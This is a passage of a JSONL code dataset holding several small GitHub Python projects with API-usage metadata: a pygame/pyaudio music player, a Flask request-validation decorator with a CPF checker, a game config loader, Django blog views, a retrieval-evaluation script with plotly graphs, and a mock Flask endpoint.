"usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tkinter.NSEW", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.VERTICAL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tkinter.NS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tkinter.EW", "line_number": 46, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 78, "usage_type": "call"}, {"api_name": "tkinter.TclError", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 115, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils.craftMenuWithStyle", "line_number": 124, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 124, "usage_type": "name"}, {"api_name": "pyperclip.copy", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.TclError", "line_number": 185, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 197, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 197, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 198, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 198, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 199, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 199, "usage_type": "name"}, {"api_name": "tkinter.TclError", "line_number": 257, "usage_type": "attribute"}]}
+{"seq_id": "25826712794", "text": "import tkinter as tk\r\nimport pygame\r\nimport pyaudio\r\nimport wave\r\n\r\n\r\n#Initialize pygame\r\npygame.mixer.init()\r\n\r\n#This will open up a pygame display window when program is run\r\n# pygame.display.set_mode((400, 300)) \r\n\r\n#Create the main window\r\nwindow = tk.Tk()\r\n\r\n#Set the size of the window\r\nwindow.geometry('600x300')\r\n\r\n#All window to be resizable by user\r\nwindow.resizable(True,True)\r\n\r\n#Set title of GUI window\r\nwindow.title(\"Music Player\")\r\n\r\n#Load the music file\r\npygame.mixer.music.load('music.mp3')\r\n\r\n# Create the play button\r\ndef play():\r\n pygame.mixer.music.play()\r\nplay_button = tk.Button(window, text=\"Play\", command=play)\r\nplay_button.pack(expand=1,fill=tk.BOTH)\r\n# play_button.place(x=0,y=0)\r\n\r\n# Create the fade out button\r\ndef fadeout():\r\n pygame.mixer.music.fadeout(3000)\r\nfadeout_button = tk.Button(window, text=\"Fade Out\", command=fadeout)\r\nfadeout_button.pack(expand=1,fill=tk.BOTH)\r\n# fadeout_button.place(x=320,y=0)\r\n\r\n# Create the pause button\r\ndef pause():\r\n pygame.mixer.music.pause()\r\npause_button = tk.Button(window, text=\"Pause\", command=pause)\r\npause_button.pack(expand=1,fill=tk.BOTH)\r\n# pause_button.place(x=160,y=0)\r\n\r\n# Create the unpause button\r\ndef unpause():\r\n pygame.mixer.music.unpause()\r\nunpause_button = tk.Button(window, text=\"Unpause\", command=unpause)\r\nunpause_button.pack(expand=1,fill=tk.BOTH)\r\n# unpause_button.place(x=240,y=0)\r\n\r\n# Create the stop button\r\ndef stop():\r\n pygame.mixer.music.stop()\r\nstop_button = tk.Button(window, text=\"Stop\", command=stop)\r\nstop_button.pack(expand=1,fill=tk.BOTH)\r\n# stop_button.place(x=80,y=0)\r\n\r\n# Initialize pyadio\r\np = pyaudio.PyAudio()\r\n\r\ndef record_audio():\r\n # Open a wave file to write the audio\r\n audio_file = wave.open('audio.wav', 'wb')\r\n audio_file.setnchannels(1)\r\n audio_file.setsampwidth(p.get_sample_size(pyaudio.paInt16))\r\n audio_file.setframerate(44100)\r\n\r\n # Start recording\r\n stream = p.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True, frames_per_buffer=1024)\r\n audio_data = stream.read(44100)\r\n audio_file.writeframes(audio_data)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_file.close()\r\n\r\n# Create a function to play audio\r\ndef play_audio():\r\n # Open the wave file\r\n audio_file = wave.open('audio.wav', 'rb')\r\n \r\n # Start playback\r\n stream = p.open(format=p.get_format_from_width(audio_file.getsampwidth()),\r\n channels=audio_file.getnchannels(),\r\n rate=audio_file.getframerate(),\r\n output=True)\r\n audio_data = audio_file.readframes(1024)\r\n while audio_data:\r\n stream.write(audio_data)\r\n audio_data = audio_file.readframes(1024)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_file.close()\r\n\r\n# Create a record button\r\nrecord_button = tk.Button(window, text=\"Record\", command=record_audio)\r\nrecord_button.pack(expand=1,fill=tk.BOTH)\r\n\r\n# Create a play button\r\nplay_recording = tk.Button(window, text=\"Play Recording\", command=play_audio)\r\nplay_recording.pack(expand=1,fill=tk.BOTH)\r\n\r\n# Run the main event loop\r\nwindow.mainloop() ", "repo_name": "thatwonguy/GUIs", "sub_path": "music_player/music_player.py", "file_name": "music_player.py", "file_ext": "py", "file_size_in_byte": 3037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.mixer.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 31, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.fadeout", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.pause", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 52, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pyaudio.PyAudio", "line_number": 64, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 68, "usage_type": "call"}, {"api_name": "pyaudio.paInt16", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pyaudio.paInt16", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wave.open", "line_number": 84, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 100, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 104, "usage_type": "call"}, {"api_name": "tkinter.BOTH", "line_number": 105, "usage_type": "attribute"}]}
+{"seq_id": "35092651827", "text": "\nfrom datetime import datetime as dt\nfrom functools import wraps\nfrom flask import request\n\ndef check(conf_schema, conf):\n try:\n conf_schema.validate(conf)\n return True,\"\"\n except SchemaError as a:\n return False,a.code\n\ndef IS_STR_DATE(format):\n def fnc(date_text):\n try:\n dt.strptime(date_text, format)\n return True\n except ValueError:\n raise SchemaError(f\"date format is invalid! value:('{date_text}')\")\n return fnc\n\ndef LEN_H_THEN(l):\n def LEN_H_THEN(x):\n if not len(x) > l:\n raise SchemaError(f\"value ('{x}') doesn't have the apropriate length!\")\n else: \n return True\n return LEN_H_THEN\n\ndef VALIDCPF(number):\n # Obtém os números do CPF e ignora outros caracteres\n cpf = [int(char) for char in number if char.isdigit()]\n\n # Verifica se o CPF tem 11 dígitos\n if len(cpf) != 11:\n raise SchemaError(f\"value ('{number}') doesn't have the apropriate length!\")\n\n # Verifica se o CPF tem todos os números iguais, ex: 111.111.111-11\n # Esses CPFs são considerados inválidos mas passam na validação dos dígitos\n # Antigo código para referência: if all(cpf[i] == cpf[i+1] for i in range (0, len(cpf)-1))\n if cpf == cpf[::-1]:\n raise SchemaError(f\"value ('{number}') is not a valid CPF number!\")\n\n # Valida os dois dígitos verificadores\n for i in range(9, 11):\n value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))\n digit = ((value * 10) % 11) % 10\n if digit != cpf[i]:\n raise SchemaError(f\"value ('{number}') is not a valid CPF number!\")\n return True\n\ndef TO_DATE(format):\n def fnc(date_text):\n try:\n return dt.strptime(date_text, format)\n except ValueError:\n raise SchemaError(f\"date format is invalid! value:('{date_text}')\")\n return fnc\n\ndef GETDATA():\n try:\n xstr = lambda s: s or \"\"\n contentJson = \"json\" in xstr(request.headers.get(\"Content-Type\"))\n if request.method == \"GET\":\n fields = request.args.to_dict()\n elif request.method in [\"POST\",\"PUT\",\"DELETE\",\"DEL\",\"CREDIT\"]:\n data = request.get_json(force=True) or request.get_json() or request.form.to_dict()\n fields = request.json if contentJson else data\n return True,fields\n except:\n return False,\"\"\n\ndef schema_required(schema,methods=\"*\",out=\"fields\"):\n def decorator(function):\n @wraps(function)\n def wrapper(*args, **kwargs):\n \n\n if methods == \"*\" or request.method in methods:\n fields = GETDATA()\n if not fields[0]:return \"json data required!\",400\n fields = fields[1]\n \n try:\n fields = schema.validate(fields)\n except SchemaError as a:\n return a.code,400\n \n kwargs[out] = fields\n result = function(*args, **kwargs)\n return result\n else:\n kwargs[out] = []\n return function(*args, **kwargs)\n\n return wrapper\n return decorator\n\n# conf = {\n# \"nome\": \"a\",\n# \"cpf\": \"08639614440\",\n# \"dataNascimento\":\"01/01/1991\",\n# \"conta\":{\n# \"limiteSaqueDiario\":0,\n# \"flagAtivo\":True,\n# \"tipoConta\":1\n# }\n# }\n\n#print(check(conf_schema, conf))\n\n", "repo_name": "melquelima/ApiTransacaoBancaria", "sub_path": "app/models/tools/required.py", "file_name": "required.py", "file_ext": "py", "file_size_in_byte": 3458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.request.form.to_dict", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "39358443065", "text": "import json\nfrom pygame.locals import Rect\n\nfrom src.pathList import CONFIG_PATH\nfrom src.logs import Logs\n\nclass Config(object):\n def __init__(self):\n super().__init__()\n\n self.logs = Logs() # Funtion logs\n\n self.path = CONFIG_PATH # config path\n self.data = {} # data (null)\n\n self.rect = Rect(0, 0, 960, 540)\n\n @property\n def parse(self):\n #=== parse data ===#\n return self.data\n\n @property\n def getVersion(self):\n try:\n return str(self.data[\"informations\"][\"version\"])\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getName(self):\n try:\n return self.data[\"informations\"][\"name\"]\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getInformation(self):\n #=== get information from config ===#\n try:\n return self.data[\"informations\"]\n except KeyError:\n self.logs.error(\"Tidak dapat mengambil data!\", keluar=True)\n\n @property\n def getRect(self):\n return self.rect\n\n def read(self):\n #==== membaca config ====#\n try:\n buka = open(self.path, \"r\").read()\n self.data = json.loads(buka)\n return True\n except IOError:\n self.logs.error(\"Tidak dapat membuka config!\", keluar=True)\n return False", "repo_name": "billalxcode/PocongRunner", "sub_path": "src/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.logs.Logs", "line_number": 11, "usage_type": "call"}, {"api_name": "src.pathList.CONFIG_PATH", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.locals.Rect", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "39480746712", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom .models import Category, Article, Comment\nfrom utils import restful\nfrom .serializer import CommentSerializers\nfrom utils.decorators import blog_login_required\n\n\n# Create your views here.\n@ensure_csrf_cookie\ndef index(request):\n categories = Category.objects.all()\n articles = Article.objects.all()\n context = {\n 'categories': categories,\n 'articles': articles\n }\n return render(request, 'index.html', context=context)\n\n\ndef article_detail(request, article_id):\n print(article_id)\n article = Article.objects.select_related('author', 'category').prefetch_related('comment_set').get(pk=article_id)\n categories = Category.objects.all()\n context = {\n 'article': article,\n 'categories': categories,\n }\n return render(request, 'article_detail.html', context=context)\n\n\n@blog_login_required\ndef comment(request):\n try:\n content = request.POST.get('content')\n pk = request.POST.get('pk')\n article = Article.objects.get(pk=pk)\n comment = Comment.objects.create(content=content, author=request.user, article=article)\n serializer = CommentSerializers(comment)\n print(serializer)\n print(\"+++++++\")\n data = serializer.data\n # data 为字典\n return restful.result(data=data)\n\n except:\n return restful.params_error(message='评论格式错误')\n\n# data = {'pub_time': '2020-03-30T23:46:39.605343+08:00', 'content': '1', 'id': 68, 'author': OrderedDict(\n# [('uuid', 'meDCdoFbj52oQX7rvaeic8'), ('telephone', '13938499083'), ('username', '王涛'), ('is_staff', True),\n# ('email', '1769710004@qq.com'), ('is_active', True)])}\n\n", "repo_name": "wang-tao182/my_blog", "sub_path": "apps/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Article.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.ensure_csrf_cookie", "line_number": 10, "usage_type": "name"}, {"api_name": "models.Article.objects.select_related", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Article.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Article.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Article", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Comment.objects.create", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 38, "usage_type": "name"}, {"api_name": "serializer.CommentSerializers", "line_number": 39, "usage_type": "call"}, {"api_name": "serializer.data", "line_number": 42, "usage_type": "attribute"}, {"api_name": "utils.restful.result", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.restful", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.restful.params_error", "line_number": 47, "usage_type": "call"}, {"api_name": "utils.restful", "line_number": 47, "usage_type": "name"}, {"api_name": "utils.decorators.blog_login_required", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "33413750307", "text": "import sys\nimport plotly.graph_objs as graph_objs\nfrom plotly.offline import plot\n\n\n# evaluates the given rankings for a retrieval model according to the given relevance judgements\ndef evaluate():\n # get file names from user\n relevance_reference_path = input(\"Please enter the full path of the relevance reference file: \").split()[0]\n model_rankings_path = input(\"Please enter the full path of the model rankings file: \").split()[0]\n start = model_rankings_path.rfind(\"/\") + 1\n stop = model_rankings_path.rfind(\".\")\n model_rankings_identifier = model_rankings_path[start:stop]\n\n # get relevance reference and model rankings from files\n relevance_reference = get_relevance_reference(relevance_reference_path)\n relevant_doc_counts = get_relevant_doc_counts(relevance_reference)\n model_rankings = get_model_rankings_and_name(model_rankings_path)\n relevant_rankings = get_relevant_rankings(relevance_reference, model_rankings)\n\n # run algorithms, accumulating output along the way\n output = mean_average_precision(relevant_rankings, model_rankings_identifier)\n output += mean_reciprocal_rank(relevant_rankings, model_rankings_identifier)\n output += precision_at_k(relevant_rankings, 5, model_rankings_identifier)\n output += precision_at_k(relevant_rankings, 20, model_rankings_identifier)\n output += recall_and_precision(relevant_rankings, model_rankings_identifier, relevant_doc_counts)\n\n # write output to file\n output_file = open(\"{0}_eval.txt\".format(model_rankings_identifier), \"w\")\n output_file.write(output)\n output_file.close()\n\n return\n\n\n# returns a dictionary that maps query_id to a list of relevant doc_ids\ndef get_relevance_reference(relevance_reference_filename):\n relevance_reference_file = open(relevance_reference_filename, \"r\")\n lines = relevance_reference_file.readlines()\n relevancy_mapping = {}\n\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n tokens = line.split()\n query_id = tokens[0]\n doc_id = tokens[2]\n\n if query_id not in relevancy_mapping:\n relevancy_mapping[query_id] = [doc_id]\n else:\n relevancy_mapping[query_id].append(doc_id)\n\n return relevancy_mapping\n\n\n# returns a dictionary that maps query_id to relevant doc counts\ndef get_relevant_doc_counts(relevance_reference):\n doc_counts = {}\n\n for q in relevance_reference:\n doc_counts[q] = len(relevance_reference[q])\n\n return doc_counts\n\n\n# returns a dictionary that maps query_id to a list of {doc_id: rank} dictionaries\n# and the of the retrieval model used to generate these rankings\ndef get_model_rankings_and_name(model_rankings_filename):\n model_rankings_file = open(model_rankings_filename, \"r\")\n lines = model_rankings_file.readlines()\n model_rankings = {}\n\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n tokens = line.split()\n query_id = tokens[0]\n doc_id = tokens[2]\n rank = tokens[3]\n\n if query_id not in model_rankings:\n doc_to_rank = {}\n doc_to_rank[doc_id] = rank\n model_rankings[query_id] = doc_to_rank\n else:\n model_rankings[query_id][doc_id] = rank\n\n return model_rankings\n\n\n# returns a dictionary that maps query_id to a list of ranks of relevant documents\ndef get_relevant_rankings(relevance_reference, model_rankings):\n relevant_rankings = {}\n\n for q in relevance_reference.keys():\n query_rankings = model_rankings[q]\n rankings_list = []\n\n for d in relevance_reference[q]:\n if d in query_rankings:\n rankings_list.append(int(query_rankings[d]))\n\n relevant_rankings[q] = rankings_list\n\n return relevant_rankings\n\n\n# returns a string that documents the mean average precision for given relevant rankings\ndef mean_average_precision(relevant_rankings, model_identifier):\n avg_precision_accumulator = 0\n\n for q in relevant_rankings.keys():\n avg_precision_accumulator += get_avg_precision(relevant_rankings[q])\n\n mean_avg_precision = avg_precision_accumulator / len(relevant_rankings)\n\n return \"The mean average precision for the {0} model is {1}.\\n\\n\".format(model_identifier, mean_avg_precision)\n\n\n# returns the average precision of the given relevant rankings\ndef get_avg_precision(relevant_ranks):\n i = 0\n precision_accumulator = 0\n\n while i < len(relevant_ranks):\n precision_accumulator += (i + 1) / relevant_ranks[i]\n i += 1\n\n return precision_accumulator / len(relevant_ranks)\n\n\n# returns a string that documents the mean reciprocal rank for the given relevant rankings\ndef mean_reciprocal_rank(relevant_rankings, model_identifier):\n reciprocal_rank_accumulator = 0\n\n for q in relevant_rankings.keys():\n reciprocal_rank_accumulator += get_reciprocal_rank(relevant_rankings[q])\n\n mean_rec_rank = reciprocal_rank_accumulator / len(relevant_rankings)\n\n return \"The mean reciprocal rank for the {0} model is {1}.\\n\\n\".format(model_identifier, mean_rec_rank)\n\n\n# returns the reciprocal rank of the given relevant rankings\ndef get_reciprocal_rank(relevant_ranks):\n first_relevant_rank = min(relevant_ranks)\n\n return 1 / first_relevant_rank\n\n\n# returns a string that documents the precision at rank k for the given relevant rankings\ndef precision_at_k(relevant_rankings, k, model_identifier):\n precision_accumulator = 0\n output = \"\"\n\n for q in relevant_rankings.keys():\n ranks = relevant_rankings[q]\n i = 0\n\n while i < len(ranks):\n if ranks[i] > k:\n prec_at_k = i / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n break\n elif ranks[i] == k:\n prec_at_k = (i + 1) / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n break\n else:\n i += 1\n\n if i >= len(ranks):\n prec_at_k = i / k\n precision_accumulator += prec_at_k\n output += \"Precision at rank {0} for query \\\"{1}\\\" in model {2} is {3}.\\n\".format(k, q, model_identifier, prec_at_k)\n\n output += \"\\n\"\n return output\n\n\n# returns a string that represents a recall-precision table for each query from the given relevant rankings\n# also creates an html Recall-Precision Graph for these queries\ndef recall_and_precision(relevant_rankings, model_identifier, relevant_doc_counts):\n output = \"\"\n max_recall_rank = 0\n\n for q in relevant_rankings:\n if relevant_rankings[q][-1] > max_recall_rank:\n max_recall_rank = relevant_rankings[q][-1]\n\n data = []\n\n for q in relevant_rankings.keys():\n relevant_ranks = relevant_rankings[q]\n relevant_docs = relevant_doc_counts[q]\n output += \"Recall vs. Precision table for query {0} with model {1}.\\n\".format(q, model_identifier)\n ranks = [i + 1 for i in range(max_recall_rank)]\n r = []\n p = []\n hits = 0\n\n for i in ranks:\n if i in relevant_ranks:\n hits += 1\n recall = hits / relevant_docs\n precision = hits / i\n r.append(recall)\n p.append(precision)\n\n output += \"rank\\t\".format()\n\n for i in ranks[:-1]:\n output += \"{0}\\t\".format(i)\n\n output += \"{0}\\nrecall\\t\".format(ranks[-1])\n\n for x in r[:-1]:\n output += \"{0}\\t\".format(x)\n\n output += \"{0}\\nprecision\\t\".format(r[-1])\n\n for y in p[:-1]:\n output += \"{0}\\t\".format(y)\n\n output += \"{0}\\n\\n\".format(p[-1])\n\n data.append(graph_objs.Scatter(x=r, y=p, name=\"Query {0}\".format(q)))\n\n # strategy for graph layout from the plotly documentation: https://plot.ly/python/figure-labels/\n layout = graph_objs.Layout(\n title=graph_objs.layout.Title(\n text=\"Recall vs. Precision for Model {0}\".format(model_identifier),\n xref=\"paper\",\n x=0\n ),\n xaxis=graph_objs.layout.XAxis(\n title=graph_objs.layout.xaxis.Title(\n text=\"Recall\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"#7f7f7f\"\n )\n )\n ),\n yaxis=graph_objs.layout.YAxis(\n title=graph_objs.layout.yaxis.Title(\n text=\"Precision\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"#7f7f7f\"\n )\n )\n )\n )\n\n figure = graph_objs.Figure(data=data, layout=layout)\n plot(figure, filename=\"recall_vs_precision_for_model_{0}.html\".format(model_identifier))\n\n return output\n\n\nif __name__ == \"__main__\":\n sys.tracebacklimit = 0\n evaluate()\n", "repo_name": "ankur-bambharoliya/Toy-search-engine", "sub_path": "python/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 9080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objs.Scatter", "line_number": 228, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 228, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 231, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 231, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.Title", "line_number": 232, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 232, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 232, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.XAxis", "line_number": 237, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 237, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 237, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.xaxis.Title", "line_number": 238, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 238, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 238, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.YAxis", "line_number": 247, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 247, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 247, "usage_type": "name"}, {"api_name": "plotly.graph_objs.layout.yaxis.Title", "line_number": 248, "usage_type": "call"}, {"api_name": "plotly.graph_objs.layout", "line_number": 248, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 248, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 259, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 259, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 260, "usage_type": "call"}, {"api_name": "sys.tracebacklimit", "line_number": 266, "usage_type": "attribute"}]}
+{"seq_id": "70000723367", "text": "import time\nfrom flask import Flask\nfrom flask import jsonify, request, make_response\nimport profileclient\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/time')\ndef get_current_time():\n return {'time': time.time()}\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # json_data is a dict with string key/val pairs\n # keys: inputValue\n # predictionValue\n # graphSelected\n # functionSelected\n json_data = request.get_json()\n # profiling_data = profileclient.Profiler().testProfile(int(json_data['functionSelected']), int(json_data['inputValue']))\n input = json_data['inputValue']\n prediction = json_data['predictionValue']\n mock_return_obj = {\n \"points\": [\n [1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5]\n ],\n \"n\": input,\n \"m\": prediction\n }\n return jsonify(status=200, data=mock_return_obj)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "austincho/PerformanceVisualization", "sub_path": "production/PerformanceVisualization/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 39, "usage_type": "call"}]}
